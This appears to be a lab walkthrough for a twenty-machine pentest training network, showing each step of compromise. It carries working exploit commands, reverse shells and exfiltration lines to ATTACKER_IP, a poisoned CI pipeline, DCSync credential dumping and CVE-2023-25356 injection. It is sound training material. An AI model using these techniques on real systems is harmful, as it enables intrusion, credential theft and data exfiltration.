A note on flags: the actual local.txt and proof.txt values are different for you than they were for me. I am leaving the hashes out. They tell you nothing. The method is the point.
How to think about a twenty box network
Before any exploitation, it helps to understand the terrain, because the whole lab is built around movement between segments you cannot reach directly.
There are four networks:
- External
192.168.x.0/24is the only thing you can reach from your attacker machine at the start. Eight machines live here, named after cities: HOUSTON01, AUSTIN02, PARIS03, MILAN04, AMSTERDAM05, SINGAPORE06, TOKYO07, SYDNEY08. - Internal 1
10.10.x.0/24holds the Active Directory domain controller plus four more machines. You reach it by pivoting through AUSTIN02, which has a second network card. - Internal 2
10.20.x.0/24holds the CI/CD and client machines. You reach it by pivoting again, this time through MAIL, which also has two network cards. - Deep
172.16.x.0/24holds three more machines, including a VoIP server. You reach it through a proxy on AMSTERDAM05.
Here is the layout:
| Segment | Subnet | Reached via | Machines |
|---|---|---|---|
| External | 192.168.x.0/24 | directly from your attacker box | HOUSTON01 (.220), AUSTIN02 (.221), PARIS03 (.222), MILAN04 (.223), AMSTERDAM05 (.224), SINGAPORE06 (.225), TOKYO07 (.226), SYDNEY08 (.227) |
| Internal 1 | 10.10.x.0/24 | pivot through AUSTIN02 (dual-NIC) | DC (.250), VM2 (.10), LAB (.11), ARCHIVE (.12), MAIL (.13) |
| Internal 2 | 10.20.x.0/24 | pivot through MAIL (dual-NIC) | CICD (.14), PREPROD (.15), CLIENT01 (.110), CLIENT02 (.111) |
| Deep | 172.16.x.0/24 | Squid proxy on AMSTERDAM05 (.224) | VM9 (.30), VM10 (.31), sipXcom (.32) |
The mental model that makes this lab tractable: a machine you own is rarely just a flag, it is a place to find the next credential or the next tunnel. Almost every box leaks something that unlocks another box. The credential table at the bottom of this post is the real map.
Two tools carry the whole thing:
- Ligolo-ng for pivoting. When you own a dual-homed machine, you run a small agent on it, and Ligolo gives your attacker box a route into the network behind it as if it were local. We use it twice: once through AUSTIN02 to reach
10.10.x, then again through MAIL to reach10.20.x. - CrackMapExec (
crackmapexec, sometimesnxc) for spraying one credential across many Windows hosts at once and running commands on the ones where it is admin.
With that in mind, let us start where you actually start: the only machines you can see.
01. The independent external machines
Two external machines can be fully owned on their own, with no credentials from anywhere else. They are the way in. A third, PARIS03, gives up a flag early through a file read.
SINGAPORE06 (.225): a fake PDF and a database shell
Start with a port scan and a directory brute force. Port 8090 serves a PHP app.
dirsearch -u http://192.168.x.225:8090/ -t 200
# finds /backend/default/ with index.php, upload.php, config.php, uploads/
Log in with admin:admin. The app is a hardware provisioning portal and it has an upload form that only accepts PDFs. We bypass that. A web server decides a file is a PDF mostly by its first few bytes (its "magic bytes"), so we make a file that starts like a PDF but is actually PHP:
printf '%%PDF-1.5\n<?php echo system($_GET["cmd"]); ?>' > cmd.php
Upload it with Content-Type: application/pdf and a .php filename (use Burp or curl to set those). The server stores it and, because the extension is .php, runs it as code. Now you have a web shell:
curl 'http://192.168.x.225:8090/backend/default/uploads/cmd.php?cmd=id'
# uid=33(www-data)
That is the foothold and the local.txt. Now loot. Two things matter here. First, sitting in the uploads directory is a real PDF, user-guide-rdweb.pdf. Download it and read it. It contains a credential:
SKYLARK\kiosk:XEwUS^9R2Gwt8O914
Keep that. It is the key to AUSTIN02 and the whole domain. Second, the app config has database creds:
cat /var/www/backend/default/config.php
# postgres:EAZT5EMULA75F8MC
For root, check your sudo rights:
sudo -l
# (postgres) NOPASSWD: /usr/bin/psql
You can run psql as the postgres user without a password. PostgreSQL's interactive client has a built-in way to run shell commands with \!, so:
sudo -u postgres psql -h 127.0.0.1 -p 5432 -U postgres
# password: EAZT5EMULA75F8MC
\! /bin/sh
# now root
cat /root/proof.txt
First box down, and we are already holding a domain credential we have not used yet.
MILAN04 (.223): old shop software and a sneaky cron
MILAN04 runs an online store on port 60001. There is one catch that shapes everything you do here: an outbound firewall only lets the machine talk back out on port 443. Any reverse shell has to use 443.
Enumerate and identify the software:
dirsearch -u http://192.168.x.223:60001/
# /catalog/, /docs/
curl http://192.168.x.223:60001/docs/CHANGELOG
# osCommerce Online Merchant v2.3.4.1
osCommerce 2.3.4.1 has a well-known flaw: the installer was left in place and never checks whether the site is already installed. So you can re-run install step 4 and inject PHP into the config file it writes. Exploit-DB has it ready as 44374.py:
searchsploit -m php/webapps/44374.py
# edit the base_url and target_url inside to point at /catalog/
python3 44374.py
# gives a web shell at /catalog/install/includes/configure.php
From that web shell, pull a PHP reverse shell and trigger it. Remember, port 443 only:
# attacker: nc -lvnp 443
# via the web shell: wget http://ATTACKER_IP/rev.php
curl http://192.168.x.223:60001/catalog/install/includes/rev.php
# shell as www-data, read local.txt
For root, the box runs Froxlor, a hosting control panel, on port 60002. Find the MySQL password (linpeas surfaces it, the osCommerce DB user is oscdb):
mysql -h 127.0.0.1 -u root -p7NVLVTDGJ38HM2TQ
Now the clever part. Froxlor lets an admin set the command it uses to reload the web server, and that command runs as root from a cron job every five minutes. So if we can become a Froxlor admin, we get root. We insert our own admin straight into the database (you can also do it through a SQL injection in the customer panel, but direct insertion is simpler once you have MySQL):
USE froxlor;
INSERT INTO panel_admins
(loginname, password, customers_see_all, domains_see_all, caneditphpsettings, change_serversettings)
VALUES ('x', '$5$...your_known_hash...', 1, 1, 1, 1);
Log into Froxlor as your new admin. Go to Settings, Webserver settings, Webserver reload command. It blocks special characters like ;|&><$~? and quotes, so you cannot just paste a one-liner. Do it in two moves instead:
- Set the reload command to
wget http://ATTACKER_IP/rev.php -O /runme.php - Click Rebuild config files, Yes, and wait for the cron job to fire (up to five minutes). Your file lands on disk.
- Change the reload command to
php /runme.php - Rebuild again. The cron runs your PHP as root and you catch the shell.
cat /root/proof.txt
PARIS03 (.222): reading files over TFTP
PARIS03 has UDP port 69 open, which is TFTP, a tiny file transfer protocol with no authentication. It is running with path traversal, meaning you can climb out of its folder and read arbitrary files:
tftp 192.168.x.222 -c get '../../../users/administrator/desktop/local.txt' /tmp/local_222.txt
That hands you the local.txt with no exploit at all. The TFTP root also holds VoIP config files (sip-config, sip_327.cfg) that contain XMPP and SIP credentials we will need much later for the deep network. Grab them all now while you are here. PARIS03 gets a full shell later once we have domain admin passwords.
02. AUSTIN02 and the keys to the domain
AUSTIN02 (.221) is the hinge of the entire lab. It is our way into Active Directory, and it is dual-homed, so it is also our first pivot.
Getting in through RDWeb
Remember the credential from the SINGAPORE06 PDF. AUSTIN02 hosts RDWeb, a web portal for published Remote Desktop apps:
http://192.168.x.221/RDweb
SKYLARK\kiosk:XEwUS^9R2Gwt8O914
Log in and download the .rdp file for the published "SkylarkStatus" app, then connect to it (note the non-standard port 10000):
xfreerdp cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp \
/u:kiosk /v:192.168.x.221 /d:SKYLARK +clipboard /port:10000 /cert-ignore
# password: XEwUS^9R2Gwt8O914
This drops you into a single published application, not a full desktop, but there is a classic escape: the app opens a file browser, and if you type cmd into the folder address bar and hit enter, you get a command prompt. From there, read local.txt.
Becoming admin with Kerberoasting
Now privilege escalation, and this is where the AD part begins. Kerberoasting asks the domain controller for service tickets that are encrypted with a service account's password hash, which you can then crack offline. Pull tickets with Rubeus:
certutil -urlcache -split -f http://ATTACKER_IP/Rubeus.exe Rubeus.exe
.\Rubeus.exe kerberoast /nowrap
You get a ticket for the account backup_service. Crack it:
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
# backup_service:It4Server
backup_service is gold. It is a local admin on several machines across the domain, and we will spray it everywhere. First, use it to get an admin shell on AUSTIN02 itself and finish the box. It does not have admin rights here directly, but it does have SeImpersonatePrivilege, which PrintSpoofer turns into SYSTEM:
evil-winrm -i 192.168.x.221 -u backup_service -p "It4Server"
# upload PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell
type C:\users\administrator\desktop\proof.txt
Looting and the first pivot
While you have a shell on AUSTIN02, gather intelligence. It has two network cards, which is your bridge into the internal network:
Ethernet0: 192.168.x.221 (external)
Ethernet1: 10.10.x.254 (internal)
Run mimikatz to dump the local Administrator's NTLM hash (you will pass this hash to other boxes later), and use PowerView to enumerate the domain and its shares. Then set up the pivot with Ligolo-ng:
# attacker:
sudo ip tuntap add user kali mode tun ligolo && sudo ip link set ligolo up
sudo ./proxy -selfcert
sudo ip route add 10.10.x.0/24 dev ligolo
# on AUSTIN02:
.\agent.exe -connect ATTACKER_IP:11601 -ignore-cert -retry -v
# in the Ligolo console, select the session and:
start
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:9001 --tcp # relay reverse shells
listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:80 --tcp # relay file downloads
The ip route add line is the important one: it tells your attacker machine to send all 10.10.x traffic through the tunnel. The whole internal network is now reachable as if you were plugged into it.
03. Sweeping the internal domain
With the tunnel up, spray backup_service across the internal machines to see where it is admin:
crackmapexec smb 10.10.x.11 10.10.x.12 10.10.x.13 10.10.x.250 \
-u backup_service -p "It4Server" --continue-on-success
# .13 MAIL (Pwn3d!)
# .11 LAB (Pwn3d!)
# .250 DC (Pwn3d!)
# .12 ARCHIVE authenticates but no admin
Three Pwn3d! results, including the domain controller. Pwn3d! means you can run commands as admin.
LAB (.11): the credential drop
Run a command through CrackMapExec or pop a reverse shell. The whole reason this box matters is the C:\backup\ folder:
C:\backup\file.txt -> skylark:User+dcGvfwTbjV[]
C:\backup\ftp1.log -> ftp_jp:~be<3@6fe1Z:2e8
Two more credentials. The first logs into HOUSTON01's web portal, the second into TOKYO07's FTP. Read this box's proof.txt and move on.
MAIL (.13): the second pivot
MAIL is the second dual-homed machine, our bridge to the 10.20.x segment:
Ethernet0: 10.10.x.13
Ethernet1: 10.20.x.13
Set up a second Ligolo tunnel, this time with the agent reaching back through the first tunnel. Download the agent onto MAIL using the file relay you set up earlier, run it, then add the new route:
# on MAIL:
.\agent.exe -connect 10.10.x.254:11601 -ignore-cert -retry -v
# in Ligolo, on the new session:
sudo ip route add 10.20.x.0/24 dev ligolo
start
Now both internal segments are reachable. Read MAIL's proof.txt.
DC (.250): the whole domain at once
The domain controller leaks a plain text file that is exactly what it sounds like:
C:\credentials.txt
- PARIS: MusingExtraCounty98
- SYDNEY: DowntownAbbey1923
Those are local admin passwords for two external machines we could not finish earlier. And because we are admin on the DC, we can run DCSync, which asks the DC to hand over the password hashes for every account in the domain, exactly as a replicating domain controller would:
.\mimikatz.exe "lsadump::dcsync /domain:skylark.com /all /csv" exit
That gives you, among everything else, the domain Administrator hash. Read the DC's local.txt and proof.txt. At this point the domain is effectively yours, and you have passwords for two more external boxes.
04. Cashing in the domain credentials
The C:\credentials.txt file and the DCSync hashes finish off the external machines we left hanging.
PARIS03 (.222) now gets a real shell over WinRM with the PARIS password (or by passing the Administrator hash):
evil-winrm -i 192.168.x.222 -u administrator -p "MusingExtraCounty98"
SYDNEY08 (.227) only has RDP open, so use the SYDNEY password there:
xfreerdp /v:192.168.x.227 /u:administrator /p:DowntownAbbey1923 /cert-ignore
# read the proof.txt in the session
HOUSTON01 (.220) is easiest with backup_service straight over WinRM:
evil-winrm -i 192.168.x.220 -u backup_service -p "It4Server"
type C:\local.txt
type C:\users\Administrator\desktop\proof.txt
But do not leave yet, because HOUSTON01 has the key to a Linux box on the inside. It runs UltraVNC, and UltraVNC stores its password in a config file with a fixed, publicly known encryption key:
type "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini"
# passwd=BFE825DE515A335BE3
Decrypt it with that well-known DES key:
echo -n 59A04800B111ADB060 | xxd -r -p | \
openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d
# R3S3+rcH
R3S3+rcH is the VNC password, and it is reused as the SSH password for the research user on VM2. Hold onto it.
05. The second internal segment
Through the MAIL tunnel, spray backup_service across 10.20.x:
crackmapexec smb 10.20.x.14 10.20.x.15 10.20.x.110 10.20.x.111 \
-u backup_service -p "It4Server" --continue-on-success
# .15 PREPROD, .110 CLIENT01, .111 CLIENT02 all Pwn3d!
# .14 CICD authenticates but no admin
PREPROD (.15) is the credential drop for this segment. Two files matter:
C:\inetpub\TODO.txt
admin:Complex__1__Password! (Filebrowser on ARCHIVE)
C:\inetpub\wwwroot\SkylarkPartnerPortal\.git\config
development:glpat-igxQz9aq3xu6s8_asknQ (GitLab access token)
The first is for ARCHIVE's file server. The second is a GitLab personal access token, our way onto CICD. Read PREPROD's flags (note its local.txt lives in the .git folder).
CLIENT01 (.110) and CLIENT02 (.111) are pure flag reads since we are already admin. Find and read them:
crackmapexec smb 10.20.x.110 -u backup_service -p "It4Server" \
-x "type c:\Users\f.miller\Desktop\local.txt"
crackmapexec smb 10.20.x.111 -u backup_service -p "It4Server" \
-x "type c:\Users\k.smith\Desktop\local.txt"
# plus the proof.txt files in the admin/offsec desktops
06. ARCHIVE: a web file manager and a captured password
ARCHIVE (.12) runs Filebrowser, a web-based file manager, on port 8080. We authenticated to its SMB earlier but were not admin; the way in is the web app, using the creds from PREPROD's TODO.txt:
http://10.10.x.12:8080
admin:Complex__1__Password!
Filebrowser has a built-in terminal feature. Use it to fire a reverse shell back through your tunnel:
/usr/bin/ncat 10.10.x.254 1234 -e /bin/bash
# read /home/archive/local.txt
For root, run pspy64 to watch processes without being root. You will see a cron job using socat to talk to a Unix socket at /tmp/s. The trick is to listen on that socket yourself and catch whatever gets sent to it, which turns out to be a password:
nc -Ul /tmp/s
# BreakfastVikings999
su root
# password: BreakfastVikings999
cat /root/proof.txt
07. CICD: a poisoned pipeline and a writable script
CICD (.14) runs GitLab. We have a GitLab token from PREPROD. The idea: GitLab runs CI/CD pipelines defined in a file called .gitlab-ci.yml, and those pipelines run commands on the runner. If we can push our own pipeline, we get code execution.
Add cicd.lab.skylark.com to your hosts file (pointed through the tunnel), then clone a repo with the token:
git clone http://development:glpat-igxQz9aq3xu6s8_asknQ@cicd.lab.skylark.com/skylark-rd/scratchpad.git
cd scratchpad
Edit .gitlab-ci.yml to include a reverse shell, then commit and push:
test:
script:
- bash -c "bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1"
git add . && git commit -m 'test' && git push
# attacker: nc -lvnp 9001 -> shell as gitlab-runner
cat /home/gitlab-runner/local.txt
For root, enumeration finds a cron job running /opt/fs_checks/fs.sh as root every five minutes, and that script sources another script, /opt/u/__fs.sh, which is world-writable. So we append our own command to it and wait:
echo 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1"' >> /opt/u/__fs.sh
# wait up to 5 minutes for the root cron -> root shell
cat /root/proof.txt
08. VM2: a reused VNC password and a namespace trick
VM2 (.10) is the Linux box whose password we decrypted from HOUSTON01's UltraVNC config. SSH straight in:
ssh research@10.10.x.10
# password: R3S3+rcH
cat /home/research/local.txt
Look in Firefox's saved passwords (decrypt the profile with firefox_decrypt.py, or just open the browser in the VNC session). You will find another password, research:1G8prY^0@8FHy&2749cg, which is an alternate login for GitLab on CICD.
For root, check sudo:
sudo -l
# (root) NOPASSWD: /usr/sbin/ip
The ip command can create network namespaces and run a process inside one, and that process runs as root:
sudo ip netns add foo
sudo ip netns exec foo /bin/sh
# uid=0
cat /root/proof.txt
09. TOKYO07: an FTP upload and a juicy potato
TOKYO07 (.226) runs FileZilla FTP on port 24621 and IIS on 24680. The FTP creds came from LAB. The key fact is that the FTP root is the same folder IIS serves web pages from, so anything you upload over FTP can be run as a web page.
ftp 192.168.x.226 -p 24621
# ftp_jp:~be<3@6fe1Z:2e8
# put an aspx web shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f aspx -o shell.aspx
# upload via FTP, then trigger it:
curl http://192.168.x.226:24680/shell.aspx
The shell runs as a service account with SeImpersonatePrivilege, so JuicyPotatoNG gets you SYSTEM:
.\JuicyPotatoNG.exe -t * -p "C:\windows\temp\nc.exe" -a "-e powershell ATTACKER_IP 9001" -l 9999
The -l 9999 flag avoids a known port conflict error. Read the flags. Then find the loot, a KeePass database:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
# C:\Users\j_local\Desktop\Passwords.kdbx
Crack it offline and open it. Inside is the credential for the next segment:
keepass2john Passwords.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/fasttrack.txt
# the database holds: ext_acc:DoNotShare!SkyLarkLegacyInternal2008 (Squid proxy)
10. The deep network behind a proxy
AMSTERDAM05 (.224) runs a Squid proxy on port 3128, and the KeePass credential logs into it. A web proxy that you can authenticate to is a way into whatever network sits behind it, so we point proxychains at it to reach the 172.16.x segment:
# /etc/proxychains4.conf
http 192.168.x.224 3128 ext_acc DoNotShare!SkyLarkLegacyInternal2008
Everything in the deep network is now reachable by prefixing commands with proxychains.
sipXcom (.32): command injection over chat
sipXcom is a VoIP server, and this one is vulnerable to CVE-2023-25356, a command injection in its sipXopenfire XMPP component. The short version: the server inspects every chat message, and any message starting with @call gets the text after it stuffed into a curl command that runs on the server. Because it is not sanitized, you can inject extra curl flags and make the server read or write any file.
Log into XMPP with the credentials we pulled from PARIS03's TFTP files long ago (j.jones:ChangeMePlease__XMPPTest and friends), using Pidgin. Then send @call messages.
First, exfiltrate the openfire log, which contains the admin password (curl -d sends a POST, so your listener needs to handle POST):
@call abc -o /tmp/dummy -d @/opt/openfire/logs/sipxopenfire-im.log http://ATTACKER_IP/abc -o /tmp/dummy
# the log reveals: superadmin:2008_EndlessConversation
To get root, write a malicious openfire.sh startup script (with a reverse shell inside it) by downloading it through the same injection. Note the -X GET, without it curl defaults to POST and the download fails:
@call abc -o /tmp/dummy -o /opt/openfire/bin/openfire.sh -X GET http://ATTACKER_IP/openfire.sh -o /tmp/dummy
Then restart the service using the admin password and the sipXcom REST API. The service manager runs openfire.sh as root, so your shell comes back as root:
curl -X DELETE -u "superadmin:2008_EndlessConversation" \
"http://172.16.x.32/sipxconfig/api/servers/1/features/instantMessage"
sleep 15
curl -X PUT -u "superadmin:2008_EndlessConversation" \
"http://172.16.x.32/sipxconfig/api/servers/1/features/instantMessage"
# catch the root shell, read proof.txt
One more thing to grab here: run tcpdump and watch the UDP syslog traffic. Another machine is logging to this one, and its log lines leak a password:
tcpdump -i ens192 udp -vvv
# 172.16.x.30 ... Msg: desktop:Deskt0pTermin4L
VM9 (.30): a SUID binary and a history file
desktop:Deskt0pTermin4L logs into VM9 over SSH or RDP through the proxy:
proxychains xfreerdp /u:desktop /p:"Deskt0pTermin4L" /v:172.16.x.30:3390
cat /home/desktop/local.txt
For root, find SUID binaries, files that run as their owner regardless of who launches them:
find / -perm -4000 -type f 2>/dev/null
# /sbin/capsh is SUID root
/sbin/capsh --gid=0 --uid=0 -- -c "cat /root/proof.txt"
And read the shell history, which leaks the password for AMSTERDAM05:
cat /home/legacy/.bash_history
# legacy:I_Miss_Windows3.1
AMSTERDAM05 (.224): the proxy box itself, via a capability
We have been using AMSTERDAM05 as a proxy this whole time; now we own it. SSH in with the password from VM9's history:
proxychains ssh legacy@192.168.x.224
# password: I_Miss_Windows3.1
cat ~/local.txt
For root, check Linux capabilities, a finer-grained version of SUID. Here vim has cap_setuid, which lets it change its user ID to root:
getcap -r / 2>/dev/null
# /usr/bin/vim.basic = cap_setuid+ep
vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
cat /root/proof.txt
VM10 (.31): the easiest root in the lab
VM10 is an old BSD machine. It has telnet on port 2323, and root has no password:
proxychains telnet 172.16.x.31 2323
# login: root
# password: (just press enter)
cat /root/proof.txt
After twenty machines, the last root is an empty password. That is Skylark's sense of humor.
The credential chain, in one place
This is the table I wish I had pinned up the whole time. Every credential, where it comes from, and what it unlocks. This is the actual structure of the lab.
| Credential | Found on | Unlocks |
|---|---|---|
admin:admin | default guess | SINGAPORE06 web app |
postgres:EAZT5EMULA75F8MC | SINGAPORE06 config.php | SINGAPORE06 root |
SKYLARK\kiosk:XEwUS^9R2Gwt8O914 | SINGAPORE06 PDF | AUSTIN02 RDWeb |
backup_service:It4Server | AUSTIN02 Kerberoast | LAB, MAIL, DC, HOUSTON01, PREPROD, clients |
skylark:User+dcGvfwTbjV[] | LAB backup folder | HOUSTON01 portal |
ftp_jp:~be<3@6fe1Z:2e8 | LAB backup folder | TOKYO07 FTP |
| Administrator NTLM hash | AUSTIN02 mimikatz / DCSync | pass-the-hash anywhere |
PARIS admin:MusingExtraCounty98 | DC credentials.txt | PARIS03 WinRM |
SYDNEY admin:DowntownAbbey1923 | DC credentials.txt | SYDNEY08 RDP |
admin:Complex__1__Password! | PREPROD TODO.txt | ARCHIVE Filebrowser |
development:glpat-... | PREPROD .git/config | CICD GitLab |
R3S3+rcH | HOUSTON01 UltraVNC config | VM2 VNC/SSH |
research:1G8prY^0@8FHy&2749cg | VM2 Firefox | CICD GitLab (alt) |
BreakfastVikings999 | ARCHIVE socket capture | ARCHIVE root |
ext_acc:DoNotShare!...2008 | TOKYO07 KeePass | AMSTERDAM05 Squid proxy |
superadmin:2008_EndlessConversation | sipXcom openfire log | sipXcom admin |
XMPP users :ChangeMePlease__XMPPTest | PARIS03 TFTP | sipXcom XMPP login |
desktop:Deskt0pTermin4L | sipXcom syslog capture | VM9 RDP/SSH |
legacy:I_Miss_Windows3.1 | VM9 bash history | AMSTERDAM05 SSH |